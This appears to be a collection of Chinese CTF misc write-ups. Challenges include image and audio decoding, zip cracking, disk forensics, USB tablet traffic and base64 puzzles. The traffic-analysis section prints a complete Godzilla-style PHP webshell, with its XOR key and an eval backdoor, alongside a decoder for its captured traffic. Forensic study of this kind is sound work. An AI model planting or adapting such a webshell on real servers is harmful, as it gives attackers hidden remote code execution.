[2, 1, 1, 1, 3, 1, 14, 1, 3, 1, 1, 1, 2, 1, 1, 1, 10, 1, 16, 1, 4, 1, 1, 1, 2, 1, 1, 1, 18, 1, 8, 1, 1, 1, 2, 1, 1, 1, 4, 1, 5]
[2, 1, 1, 1, 3, 1, 14, 1, 3, 1, 1, 1, 2, 1, 1, 1, 10, 1, 16, 1, 4, 1, 1, 1, 2, 1, 1, 1, 17, 1, 1, 1, 7, 1, 1, 1, 2, 1, 1, 1, 4, 1, 5]
[2, 1, 5, 1, 14, 1, 3, 1, 1, 1, 4, 1, 10, 1, 16, 1, 7, 1, 4, 1, 16, 1, 1, 1, 7, 1, 2, 1, 4, 1, 3, 1, 5]
[2, 1, 5, 1, 14, 1, 3, 1, 2, 1, 4, 1, 9, 1, 16, 1, 7, 1, 4, 1, 16, 1, 1, 1, 10, 1, 4, 1, 3, 1, 5]
[2, 1, 5, 1, 3, 1, 1, 1, 2, 1, 5, 1, 3, 1, 2, 1, 4, 1, 1, 1, 5, 1, 1, 1, 2, 1, 9, 1, 3, 1, 2, 1, 4, 1, 4, 1, 1, 1, 1, 1, 7, 1, 1, 1, 4, 1, 3, 1, 6, 1, 4, 1, 3, 1, 5]
[2, 1, 5, 1, 3, 1, 1, 1, 2, 1, 1, 1, 3, 1, 3, 1, 2, 1, 3, 1, 2, 1, 4, 1, 1, 1, 2, 1, 1, 1, 7, 1, 1, 1, 2, 1, 1, 1, 5, 1, 4, 1, 1, 1, 1, 1, 7, 1, 1, 1, 4, 1, 3, 1, 1, 1, 4, 1, 4, 1, 3, 1, 5]
[2, 1, 5, 1, 3, 1, 1, 1, 2, 1, 1, 1, 3, 1, 3, 1, 2, 1, 3, 1, 2, 1, 4, 1, 1, 1, 2, 1, 9, 1, 4, 1, 1, 1, 5, 1, 3, 1, 2, 1, 2, 1, 6, 1, 2, 1, 3, 1, 2, 1, 2, 1, 4, 1, 4, 1, 3, 1, 5]
[2, 1, 1, 1, 3, 1, 5, 1, 2, 1, 1, 1, 3, 1, 3, 1, 2, 1, 2, 1, 8, 1, 1, 1, 2, 1, 9, 1, 4, 1, 1, 1, 4, 1, 3, 1, 6, 1, 6, 1, 2, 1, 3, 1, 2, 1, 2, 1, 4, 1, 2, 1, 5, 1, 5]
[2, 1, 1, 1, 3, 1, 6, 1, 1, 1, 1, 1, 2, 1, 4, 1, 1, 1, 3, 1, 3, 1, 4, 1, 1, 1, 2, 1, 9, 1, 4, 1, 1, 1, 4, 1, 3, 1, 6, 1, 6, 1, 2, 1, 3, 1, 2, 1, 2, 1, 3, 1, 3, 1, 5, 1, 5]
[2, 1, 5, 1, 6, 1, 1, 1, 4, 1, 4, 1, 1, 1, 3, 1, 3, 1, 4, 1, 2, 1, 1, 1, 9, 1, 4, 1, 6, 1, 3, 1, 6, 1, 6, 1, 2, 1, 3, 1, 2, 1, 2, 1, 3, 1, 3, 1, 1, 1, 4, 1, 4]
[2, 1, 5, 1, 3, 1, 1, 1, 2, 1, 4, 1, 4, 1, 1, 1, 4, 1, 2, 1, 4, 1, 2, 1, 1, 1, 9, 1, 4, 1, 6, 1, 4, 1, 3, 1, 1, 1, 6, 1, 2, 1, 3, 1, 2, 1, 2, 1, 3, 1, 5, 1, 3, 1, 5]
[2, 1, 5, 1, 3, 1, 1, 1, 2, 1, 5, 1, 3, 1, 1, 1, 5, 1, 2, 1, 3, 1, 2, 1, 2, 1, 9, 1, 3, 1, 1, 1, 3, 1, 6, 1, 1, 1, 1, 1, 7, 1, 2, 1, 3, 1, 2, 1, 2, 1, 3, 1, 5, 1, 3, 1, 5]
[2, 1, 5, 1, 3, 1, 2, 1, 1, 1, 5, 1, 4, 1, 1, 1, 4, 1, 1, 1, 4, 1, 2, 1, 2, 1, 9, 1, 3, 1, 1, 1, 3, 1, 6, 1, 1, 1, 2, 1, 6, 1, 2, 1, 3, 1, 2, 1, 2, 1, 2, 1, 6, 1, 3, 1, 5]
[2, 1, 5, 1, 3, 1, 2, 1, 1, 1, 5, 1, 6, 1, 4, 1, 6, 1, 2, 1, 3, 1, 9, 1, 2, 1, 1, 1, 3, 1, 6, 1, 1, 1, 2, 1, 6, 1, 2, 1, 3, 1, 2, 1, 2, 1, 2, 1, 6, 1, 3, 1, 5]
[2, 1, 5, 1, 3, 1, 1, 1, 2, 1, 1, 1, 3, 1, 6, 1, 4, 1, 1, 1, 4, 1, 2, 1, 4, 1, 9, 1, 1, 1, 1, 1, 3, 1, 6, 1, 1, 1, 2, 1, 6, 1, 2, 1, 3, 1, 2, 1, 2, 1, 2, 1, 6, 1, 3, 1, 5]
[2, 1, 5, 1, 3, 1, 1, 1, 2, 1, 1, 1, 3, 1, 5, 1, 5, 1, 6, 1, 1, 1, 5, 1, 9, 1, 1, 1, 1, 1, 2, 1, 7, 1, 1, 1, 2, 1, 6, 1, 2, 1, 3, 1, 2, 1, 2, 1, 1, 1, 7, 1, 3, 1, 5]
[2, 1, 5, 1, 3, 1, 1, 1, 2, 1, 1, 1, 3, 1, 5, 1, 4, 1, 2, 1, 1, 1, 2, 1, 1, 1, 17, 1, 2, 1, 1, 1, 6, 1, 2, 1, 1, 1, 7, 1, 2, 1, 3, 1, 2, 1, 2, 1, 1, 1, 4, 1, 2, 1, 3, 1, 5]
[2, 1, 5, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 3, 1, 3, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 7, 1, 1, 1, 2, 1, 2, 1, 1, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 7, 1, 1, 1, 3, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 4, 1, 5]
[2, 1, 6, 1, 2, 1, 2, 1, 1, 1, 5, 1, 3, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 7, 1, 1, 1, 2, 1, 2, 1, 1, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 7, 1, 1, 1, 3, 1, 1, 1, 2, 1, 3, 1, 1, 1, 2, 1, 1, 1, 4, 1, 5]
[12, 1, 5, 1, 4, 1, 4, 1, 3, 1, 10, 1, 4, 1, 9, 1, 14, 1, 4, 1, 8, 1, 1, 1, 8, 1, 9, 1, 4, 1, 6]
[19, 1, 4, 1, 62, 1, 24, 1, 7]
[19, 1, 4, 1, 62, 1, 24, 1, 7]
[17, 1, 1, 1, 31, 1, 1, 1, 1, 1, 25, 1, 1, 1, 1, 1, 1, 1, 32]
[17, 1, 1, 1, 31, 1, 1, 1, 1, 1, 25, 1, 1, 1, 1, 1, 1, 1, 32]
[17, 1, 1, 1, 67, 1, 32]
[120]
[21, 1, 1, 1, 1, 1, 86, 1, 1, 1, 1, 1, 3]
[120]
[120]

一个没后缀的文件，用010打开，好多组数据，但加起来都是120，其中1特别多，把是1的地方画出来

s =[
[120],
[120],
[24, 1, 87, 1, 7],
[7, 1, 15, 1, 21, 1, 16, 1, 49, 1, 7],
[2, 1, 1, 1, 2, 1, 15, 1, 4, 1, 3, 1, 1, 1, 10, 1, 16, 1, 4, 1, 1, 1, 2, 1, 1, 1, 19, 1, 7, 1, 1, 1, 2, 1, 1, 1, 3, 1, 6],
[2, 1, 1, 1, 3, 1, 14, 1, 3, 1, 1, 1, 2, 1, 1, 1, 10, 1, 16, 1, 4, 1, 1, 1, 2, 1, 1, 1, 18, 1, 8, 1, 1, 1, 2, 1, 1, 1, 4, 1, 5],
[2, 1, 1, 1, 3, 1, 14, 1, 3, 1, 1, 1, 2, 1, 1, 1, 10, 1, 16, 1, 4, 1, 1, 1, 2, 1, 1, 1, 17, 1, 1, 1, 7, 1, 1, 1, 2, 1, 1, 1, 4, 1, 5],
[2, 1, 5, 1, 14, 1, 3, 1, 1, 1, 4, 1, 10, 1, 16, 1, 7, 1, 4, 1, 16, 1, 1, 1, 7, 1, 2, 1, 4, 1, 3, 1, 5],
[2, 1, 5, 1, 14, 1, 3, 1, 2, 1, 4, 1, 9, 1, 16, 1, 7, 1, 4, 1, 16, 1, 1, 1, 10, 1, 4, 1, 3, 1, 5],
[2, 1, 5, 1, 3, 1, 1, 1, 2, 1, 5, 1, 3, 1, 2, 1, 4, 1, 1, 1, 5, 1, 1, 1, 2, 1, 9, 1, 3, 1, 2, 1, 4, 1, 4, 1, 1, 1, 1, 1, 7, 1, 1, 1, 4, 1, 3, 1, 6, 1, 4, 1, 3, 1, 5],
[2, 1, 5, 1, 3, 1, 1, 1, 2, 1, 1, 1, 3, 1, 3, 1, 2, 1, 3, 1, 2, 1, 4, 1, 1, 1, 2, 1, 1, 1, 7, 1, 1, 1, 2, 1, 1, 1, 5, 1, 4, 1, 1, 1, 1, 1, 7, 1, 1, 1, 4, 1, 3, 1, 1, 1, 4, 1, 4, 1, 3, 1, 5],
[2, 1, 5, 1, 3, 1, 1, 1, 2, 1, 1, 1, 3, 1, 3, 1, 2, 1, 3, 1, 2, 1, 4, 1, 1, 1, 2, 1, 9, 1, 4, 1, 1, 1, 5, 1, 3, 1, 2, 1, 2, 1, 6, 1, 2, 1, 3, 1, 2, 1, 2, 1, 4, 1, 4, 1, 3, 1, 5],
[2, 1, 1, 1, 3, 1, 5, 1, 2, 1, 1, 1, 3, 1, 3, 1, 2, 1, 2, 1, 8, 1, 1, 1, 2, 1, 9, 1, 4, 1, 1, 1, 4, 1, 3, 1, 6, 1, 6, 1, 2, 1, 3, 1, 2, 1, 2, 1, 4, 1, 2, 1, 5, 1, 5],
[2, 1, 1, 1, 3, 1, 6, 1, 1, 1, 1, 1, 2, 1, 4, 1, 1, 1, 3, 1, 3, 1, 4, 1, 1, 1, 2, 1, 9, 1, 4, 1, 1, 1, 4, 1, 3, 1, 6, 1, 6, 1, 2, 1, 3, 1, 2, 1, 2, 1, 3, 1, 3, 1, 5, 1, 5],
[2, 1, 5, 1, 6, 1, 1, 1, 4, 1, 4, 1, 1, 1, 3, 1, 3, 1, 4, 1, 2, 1, 1, 1, 9, 1, 4, 1, 6, 1, 3, 1, 6, 1, 6, 1, 2, 1, 3, 1, 2, 1, 2, 1, 3, 1, 3, 1, 1, 1, 4, 1, 4],
[2, 1, 5, 1, 3, 1, 1, 1, 2, 1, 4, 1, 4, 1, 1, 1, 4, 1, 2, 1, 4, 1, 2, 1, 1, 1, 9, 1, 4, 1, 6, 1, 4, 1, 3, 1, 1, 1, 6, 1, 2, 1, 3, 1, 2, 1, 2, 1, 3, 1, 5, 1, 3, 1, 5],
[2, 1, 5, 1, 3, 1, 1, 1, 2, 1, 5, 1, 3, 1, 1, 1, 5, 1, 2, 1, 3, 1, 2, 1, 2, 1, 9, 1, 3, 1, 1, 1, 3, 1, 6, 1, 1, 1, 1, 1, 7, 1, 2, 1, 3, 1, 2, 1, 2, 1, 3, 1, 5, 1, 3, 1, 5],
[2, 1, 5, 1, 3, 1, 2, 1, 1, 1, 5, 1, 4, 1, 1, 1, 4, 1, 1, 1, 4, 1, 2, 1, 2, 1, 9, 1, 3, 1, 1, 1, 3, 1, 6, 1, 1, 1, 2, 1, 6, 1, 2, 1, 3, 1, 2, 1, 2, 1, 2, 1, 6, 1, 3, 1, 5],
[2, 1, 5, 1, 3, 1, 2, 1, 1, 1, 5, 1, 6, 1, 4, 1, 6, 1, 2, 1, 3, 1, 9, 1, 2, 1, 1, 1, 3, 1, 6, 1, 1, 1, 2, 1, 6, 1, 2, 1, 3, 1, 2, 1, 2, 1, 2, 1, 6, 1, 3, 1, 5],
[2, 1, 5, 1, 3, 1, 1, 1, 2, 1, 1, 1, 3, 1, 6, 1, 4, 1, 1, 1, 4, 1, 2, 1, 4, 1, 9, 1, 1, 1, 1, 1, 3, 1, 6, 1, 1, 1, 2, 1, 6, 1, 2, 1, 3, 1, 2, 1, 2, 1, 2, 1, 6, 1, 3, 1, 5],
[2, 1, 5, 1, 3, 1, 1, 1, 2, 1, 1, 1, 3, 1, 5, 1, 5, 1, 6, 1, 1, 1, 5, 1, 9, 1, 1, 1, 1, 1, 2, 1, 7, 1, 1, 1, 2, 1, 6, 1, 2, 1, 3, 1, 2, 1, 2, 1, 1, 1, 7, 1, 3, 1, 5],
[2, 1, 5, 1, 3, 1, 1, 1, 2, 1, 1, 1, 3, 1, 5, 1, 4, 1, 2, 1, 1, 1, 2, 1, 1, 1, 17, 1, 2, 1, 1, 1, 6, 1, 2, 1, 1, 1, 7, 1, 2, 1, 3, 1, 2, 1, 2, 1, 1, 1, 4, 1, 2, 1, 3, 1, 5],
[2, 1, 5, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 3, 1, 3, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 7, 1, 1, 1, 2, 1, 2, 1, 1, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 7, 1, 1, 1, 3, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 4, 1, 5],
[2, 1, 6, 1, 2, 1, 2, 1, 1, 1, 5, 1, 3, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 7, 1, 1, 1, 2, 1, 2, 1, 1, 1, 1, 1, 2, 1, 1, 1, 2, 1, 1, 1, 7, 1, 1, 1, 3, 1, 1, 1, 2, 1, 3, 1, 1, 1, 2, 1, 1, 1, 4, 1, 5],
[12, 1, 5, 1, 4, 1, 4, 1, 3, 1, 10, 1, 4, 1, 9, 1, 14, 1, 4, 1, 8, 1, 1, 1, 8, 1, 9, 1, 4, 1, 6],
[19, 1, 4, 1, 62, 1, 24, 1, 7],
[19, 1, 4, 1, 62, 1, 24, 1, 7],
[17, 1, 1, 1, 31, 1, 1, 1, 1, 1, 25, 1, 1, 1, 1, 1, 1, 1, 32],
[17, 1, 1, 1, 31, 1, 1, 1, 1, 1, 25, 1, 1, 1, 1, 1, 1, 1, 32],
[17, 1, 1, 1, 67, 1, 32],
[120],
[21, 1, 1, 1, 1, 1, 86, 1, 1, 1, 1, 1, 3],
[120],
[120],
]

for i in s:
    for k in i:
        if k != 1:
            for i in range(k):
                print('   ', end='')
        else:
            print('###', end='')
    print('')

最后flag为

flag{93ids_sk23a_p1o23}

[NewStarCTF 2023 公开赛道]压缩包们

加上后缀.zip,修复压缩包flag.zip,发现一串base64编码

SSBsaWtlIHNpeC1kaWdpdCBudW1iZXJzIGJlY2F1c2UgdGhleSBhcmUgdmVyeSBjb25jaXNlIGFuZCBlYXN5IHRvIHJlbWVtYmVyLg==

解码得到密码提示：6位纯数字,爆破得到密码：232311，解压压缩包得到flag

最后flag为

flag{y0u_ar3_the_m4ter_of_z1111ppp_606a4adc} 

[BSidesSF2020]toast-clicker1

jadx查看apk文件，发现一共有22个数字，猜测可能是每个数字偏移0-22

a= '67, 83, 68, 120, 62, 109, 95, 90, 92, 112, 85, 73, 99, 82, 53, 99, 101, 92, 80, 89, 81, 104'
a = a.split(', ')
c=''
for index, v in enumerate(a):
    c += chr(int(v)+index)
    # c += chr(int(v, 8))
print(c)

最后flag为

flag{Bready_To_Crumble}

[b01lers2020]minecraft_purdue

[BUUCTF:b01lers2020]minecraft_purdue - B0mbax - 博客园

[BSidesSF2019]bWF0cnlvc2hrYQ

从一道CTF题目到非对称加密GPG/PGP的学习 | m0re的小站

[NewStarCTF 2023 公开赛道]空白格

解密即可

Whitelips the Esoteric Language IDE

最后flag为

flag{w3_h4v3_to0_m4ny_wh1t3_sp4ce_2a5b4e04}

[GWCTF2019]math

nc连接环境

计算150次

exp:

from pwn import *
#TODO：获取算式的参数自动计算后反弹输入运算结果。
p=remote('node3.buuoj.cn','25094')
for i in range(0,150):
        ou=p.recvuntil('problem: ')#定位到问题
        print ou
        a=int(p.recvuntil('*')[:-1])#获取乘法的第一个值
        b=int(p.recvuntil('-')[:-1])#获取乘法的第二个值
        c=int(p.recvuntil('+')[:-1])#获取加法的第一个值
        d=int(p.recvuntil('=')[:-1])#获取加法的第二个值
        p.sendline(str(a*b-c+d))#反弹计算结果
p.interactive()#与远端交互，这样才能远程命令去找flag。

[NPUCTF2020]回收站

AccessData FTK Imager挂载得到flag

[NewStarCTF 公开赛赛道]还是流量分析

题目描述:

救赎之道，就在其中。 Flag格式：flag{WebShell-Key值_机密文件内容} 例如：flag{d8ff731bdba84bf5_sercet} P.S：请注意Key值并非密码！

WebShell-Key

@session_start();
@set_time_limit(0);
@error_reporting(0);

function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}

$pass='babyshell';
$payloadName='payload';
$key='421eb7f1b8e4b3cf';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
		eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

在tcp.stream eq 35发现读取secret

<?php


function response_decode($D,$K){
    $D = base64_decode($D);
    for($i=0;$i<strlen($D);$i++){
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    var_dump(gzdecode($D));
}

function request_decode($D,$K){
    $D = base64_decode(urldecode($D));
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    var_dump(gzdecode($D));
}

$response_data = 'LbptYjdmMWI4ZketfMqs+Pt4UU45UAFSyKkfUx0RSxrD/S6FNWbN6MfnLmIzYw==';
$request_data = 'LbptYjdmMWI4ZX+sfpKv+HlUtwFXBhmsaLV5NGMpKGVi40opG7QeTRey+0r6rrdjgH8rTma25kl2SH4sHrI0ZgKDNlH7Kxyr8CrFKf8uA9Y0WyvPfytHrPeoea54YmZsvcRnNjdmMQ==';
$key = '421eb7f1b8e4b3cf';

request_decode($request_data, $key);
response_decode($response_data, $key);

php在线运行

最后flag为

flag{421eb7f1b8e4b3cf_Godzilla1sS000Int3rEstIng}

[NewStarCTF 2023 公开赛道]Nmap

题目描述:

请给出Nmap扫描得到所有的开放端口用英文逗号分隔，端口号从小到大排列。 例如flag{21,22,80,8080}

过滤tcp.flags.syn == 1 and tcp.flags.ack == 1

最后flag为

flag{80,3306,5000,7000,8021,9000}

[BSidesSF2020]mpfrag

下载附件

挂载文件

提示超级块损坏
用备用块修复。备用块在文件系统的8193块（ext2 的默认块大小是1k）
dd提取备用块

dd if=disk.bin bs=1024 skip=8193 count=1 of=disk2.bin

把备用块放入disk.bin

dd if=disk2.bin of=disk.bin bs=1024 conv=notrunc seek=1

fls列出文件系统中所有文件

fls disk.bin

cloud_key.mpeg已经被删除了，尝试修复并提取

blkls disk.bin > unalloc.bin

hexdump -C unalloc.bin | egrep '^.....[048c].. 00 00 01 ba' | head

dd if=unalloc.bin bs=1 skip=10240 of=out.mpeg

提取压缩包

icat disk.bin 29 > cloud.zip

最后flag为

flag{bridge_ext2_gaps}

[NewStarCTF 2023 公开赛道]永不消逝的电波

题目描述:

或许有节奏的声音中传递着一些信息;flag请按照flag{}的格式进行提交，涉及字母均为小写

一眼摩斯

整理为

..-. .-.. .- --. - .... . -... . ... - -.-. - ..-. . .-. .. ... -.-- --- ..-

摩斯解密

[UTCTF2020]dns-shell

请看大佬博客

UTCTF 2020 - Do Not Stop

洞拐洞拐洞洞拐

题目描述:

这是一道高难度的MISC题 尽管答题，做的出来算我输 注意：得到的 flag 请包上 flag{} 提交

下载附件

黑色为1，白色为0，进行python处理

from PIL import Image

MAX = 320
p =Image.open('C:\\Users\\23831\\Desktop\\2239f085-4e8c-425b-9e8e-793c982c42f5.png').convert('L')
fp = open('C:\\Users\\23831\\Desktop\\2.txt','w')
flag = ''
for x in range(MAX):
    for y in range(MAX):
        if p.getpixel((x,y))==255:
            flag += '0'
        if p.getpixel((x,y))== 0 :
            flag += '1'

fp.write(flag) 

得到

赛博厨子一把梭得到wav文件

查看音频

每秒有十帧，共有八种不同的高度，发现每段只有 8 种可能：-0.75 -0.5 -0.25 0.0 0.25 0.5 0.75 1.0

八进制，转换前半部分得到 115132127107 ，如果按3个拆分，可以得到 77 90 87 71 ，都属于Ascii 可打印字符，用Python 脚本进行转换，代码如下：

import wave
import base64
f = wave.open("C:\\Users\\23831\\Desktop\\download.wav","rb")
params=f.getparams()
nchannels, sampwidth, framerate, nframes = params[:4]
flag = ''
rflag = ''
for i in range(319):
	strData=f.readframes(10)
	if strData == b'\x01\xa0\x01\xa0\x01\xa0\x01\xa0\x01\xa0\x01\xa0\x01\xa0\x01\xa0\x01\xa0\x01\xa0':
		flag += '0'
	if strData == b'\x01\xc0\x01\xc0\x01\xc0\x01\xc0\x01\xc0\x01\xc0\x01\xc0\x01\xc0\x01\xc0\x01\xc0':
		flag += '1'
	if strData == b'\x01\xe0\x01\xe0\x01\xe0\x01\xe0\x01\xe0\x01\xe0\x01\xe0\x01\xe0\x01\xe0\x01\xe0':
		flag += '2'
	if strData == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00':
		flag += '3'
	if strData == b'\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f':
		flag += '4'
	if strData == b'\xff?\xff?\xff?\xff?\xff?\xff?\xff?\xff?\xff?\xff?':
		flag += '5'
	if strData == b'\xff_\xff_\xff_\xff_\xff_\xff_\xff_\xff_\xff_\xff_':
		flag += '6'
	if strData == b'\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f\xff\x7f':
		flag += '7'
flag += '5'
for i in range(0,len(flag),3):
	b = flag[i]+flag[i+1]+flag[i+2]
	c = int(b,8)
	rflag += chr(c)
rflag += '======'
flag = base64.b32decode(rflag)
print(flag)

运行得到

最后flag为

flag{78c639623249830f5a696d1888bf34aed325c8cc23ddawd51zzqz23333aa}

[HITCON2018]ev3basic

请看

ev3_basic——HITCON CTF 2018_ev3basic-CSDN博客

[RoarCTF2019]davinci_cipher

题目描述:

达芬奇偷偷把key画了下来，你能找到key然后解开密码吗？

下载附件

flag.txt

U+1F643U+1F4B5U+1F33FU+1F3A4U+1F6AAU+1F30FU+1F40EU+1F94BU+1F6ABU+1F606U+1F383U+1F993U+2709U+1F33FU+1F4C2U+2603U+1F449U+1F6E9U+2705U+1F385U+2328U+1F30FU+1F6E9U+1F6A8U+1F923U+1F4A7U+1F383U+1F34DU+1F601U+2139U+1F4C2U+1F6ABU+1F463U+1F600U+1F463U+1F643U+1F3A4U+2328U+1F601U+1F923U+1F3A4U+1F579U+1F451U+1F6AAU+1F374U+1F579U+1F607U+1F374U+1F40EU+2705U+2709U+1F30FU+23E9U+1F40DU+1F6A8U+2600U+1F607U+1F3F9U+1F441U+1F463U+2709U+1F30AU+1F6A8U+2716

unicode解密得到

数位板流量

import os
import matplotlib.pyplot as plt
os.system("tshark -r 1.pcapng -T fields -e usb.capdata| sed '/^\s*$/d' > 1.txt")
data=[]
with open('1.txt',"r") as f:
    for line in f.readlines():
        if line[16:18] !="00":
            data.append(line)
X = []
Y = []
for line in data:
        x0=int(line[4:6],16)
        x1=int(line[6:8],16)
        x=x0+x1*256
        y0=int(line[10:12],16)
        y1=int(line[12:14],16)
        y=y0+y1*256
        X.append(x)
        Y.append(-y)
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax1.set_title("result")
ax1.scatter(X, Y, c='b', marker='o')
plt.show()

得到字符串：

MONA_LISA_IS_A_MAN

emoji解密

最后flag为

flag{wm-m0de3n_dav1chi}

[NewStarCTF 2023 公开赛道]base!

下载附件

bXkgc291bCdzIHRoZSBza3nigJTigJRteSBmbHlpbmcgc291bCF=
dGhlIGxpZ2h0bmlnaHQgZmxhcmUsdGhlIHRodW5kZXIgcm9sbCy=
dGhlIHN1biBhbmQgbW9vbiBhbmQgc3RhcnMgZ28gYnks
YW5kIGdyZWF0IHdpbmRzIHN3ZWVwIG15IHNvdWwsdGhlIHNreSG=
bXkgYnJvb2Rpbmcgc291bOKAlOKAlG15IHNvdWwncyB0aGUgc2VhIV==
dGhlIHNuYWt5IHdlZWQsYW5kIHdoaXNoaW5nIHNjcmVlLB==
dGhlIHdoaXRlIHdhdmUncyBzdXJnZSBmcm9tIHBvbGUgdG8gcG9sZSw=
YW5kIHN0aWxsIGdyZWVuIGRlcHRo4oCU4oCUdGhlIHNlYSdzIG15IHNvdWwh
bXkgc291bCdzIHRoZSBzcHJpbmfigJTigJRteSBsb3ZlaW5nIHNvdWwh
d2lsbCBkYW5jZSxhbmQgbGVhcCxhbmQgZHJhaW4gdGhlIGJvd2x=
b2YgbG92ZTthbmQgbG9uZ2luZyx0d2luZSBhbmQgY2xpbmc=
dG8gYWxsIHRoZSB3b3JsZOKAlOKAlG15IHNvdWwncyB0aGUgc3ByaW5nId==
bXkgZmV2ZXJlZCBzb3VsIW15IHNvdWwncyB0aGUgdG93biF=
dGhybydmbGFyaW5nIHN0cmVldCBnb2VzIHV4IGFuZCBkb3duO4==
dGhlIGJlbGxzIG9mIGZlYXN0IGFuZCB0cmFmZmljIHRvbGy=
YW5kIG1hemUgdGhlaXIgbXVzaWMgaW4gbXkgc291bC4=
bXkgdHJhbnF1aWwgc291bCFteSBzb3VsIHRvbyB3aWRl
Zm9yIHNreSxvciBzcHJpbmcsdG93bixvciB0aWRlId==
dGhvdSB0cmF2ZWxsZXIgdG8gb3V0ZXIgc3RyYW5k
b2YgaG9tZSBzZXJlbmXigJTigJRteSBzb3VsIHNvIGdyYW5kIZ==
dGhleSBoYXZlIHdhdGVyZWQgdGhlIHN0cmVldCx=
aXQgc2hpbmVzIGluIHRoZSBnbGFyZSBvZiBsYW1ycyy=
Y29sZCx3aGl0ZSBsYW1ycyy=
YW5kIGxpZXN=
bGlrZSBhIHNsb3ctbW92aW5nIHJpdmVyLD==
YmFycmVkIHdpdGggc2lsdmVyIGFuZCBibGFjay5=
Y2FicyBnbyBkb3duIGl0LG==
b25lLO==
YW5kIHRoZW5gYW5vdGhlci5=
YmV0d2VlbiB0aGVuIGkgaGVhciB0aGUgc2h1ZmZsaW5nIG9mIGZlZXQu
dHJhbXBzIGRvemUgb24gdGhlIHdpbmRvdy1sZWRnZXMs
bmlnaHQtd2Fsa2VycyBwYXNzIGFsb25nIHRoZSBzaWRlLXdhbGtzLl==
dGhlIGNpdHkgaXMgc3F1YWxpZCBhbmQgc2luaXN0ZXIs
d2l0aCB0aGUgc2lsdmVyLWJhcnJlZCBzdHJlZXQgaW4gdGhlIG1pZHN0LB==
c2xvdy1tb3Zpbmcs
YSByaXZlciBsZWFkaW5nIG5vd2hlcmUu
b3Bwb3NpdGUgbXkgd2luZG93LB==
dGhlIG1vb24gY3V0cyy=
Y2xlYXIgYW5kIHJvdW5kLE==
dGhyb3UgdWdoIHRoZSBwbHVtLWNvbG9yZWQgbmlnaHQu
c2hlIGNhbm5vdCBvaWdodCB0aGUgY2l0eTv=
aXQgaXMgdG9vIGJyaWdodC5=
aXQgd2FzIHdoaXRlIGxhbXBzLH==
YW5kIGdsaXR0ZXJzIGNvbGRseS5=
aSBzdGFuZCBpbiB0aGUgd2luZG93IGFuZCB3YXRjaCB0aGUgbW9vbi4=
c2hlIGlzIHRoaW4gYW5kIGx1c3RyZWxlc3Ms
YnV0IGkgbG92ZSBoZXIu
aSBrbm93IHRoZSBtb29uLE==
YW5kIHRoaXMgaXMgYW5gYWxpZW5gY2l0eS5=
QnJveWV1ciBkZSB0aMOpIGRlIGZsZXVycyBhdSBwcmludGVtcHMgZGUgbGEgbG9uZ3VlIGltcGFzc2UgZGFucyC=
bGVzIGFyYnJlcy3gZmFkZS3gbWFpcyB0dSBhcnJpdmUgdHJvcCB0YXJkLCB0cm93IHNldW3sIGRhbnMgbGEgc3==
b2xpdHVkZSwlZGUlYmVsbGVzIGZsZXVycywlcGxlaW5lIGRlIGwnaW1wdWlzc2FuY2UlZGUlbGEldHJpc3Rlc3NlLl==
TGEgZmxldXIgdG9tYmUgbGEgbmVpZ2Ugc2FpdCBjb21iaWVuLCBpbGx1c29p
cmUsIHBhc3PDqWUsIHR1IHNhaXMmcXVlIGplIHQnYWltZS4uLm==
SSByZW1lbWJlciBxdWl0ZSBjbGVhcmx5IG5vdyB3aGVuIHRoZSBzdG9yeSBoYXBwZW5lZC4g
VGhlIGF1dHVtbiBsZWF2ZXMgd2VyZSBmbG9hdGluZyBpbiBtZWFzdXJlIGRvd24gdG8gdGhlIGdyb3VuZC/gcmVjb/==
dmVyaW5nIHRoZSBsYWtlLCB3aGVyZSB3ZSB1c2VkIHRvIHN3aW0gbGlrZX==
IGNoaWxkcmVuLCB1bmRlciB0aGUgc3VuIHdhcyB0aGVyZSB0byBzaGlyZS4g
VGhhdCB0aW1lIHdlIHVzZWQgdG8gYmUgaGFwcHkuIF==
V2VsbCwgSSB0aG91Z2h0IHdlIHdlcmUuIF==
QnV0IHRoZSB0cnV0aCB3YXMgdGhhdCB5b3UgaGFkIGJlZW4gbG9uZ2luZyB0byBsZWF2ZSBtZSwgbm90IGRhcmluZyB0byB0ZWxsIG1lLiC=
T24gdGhhdCBwcmVjaW91cyBuaWdodCwgd2F0Y2hpbmcgdGhlIGxha2UsIHZhZ3VlbHkgY29uc2Npb3VzLiB=
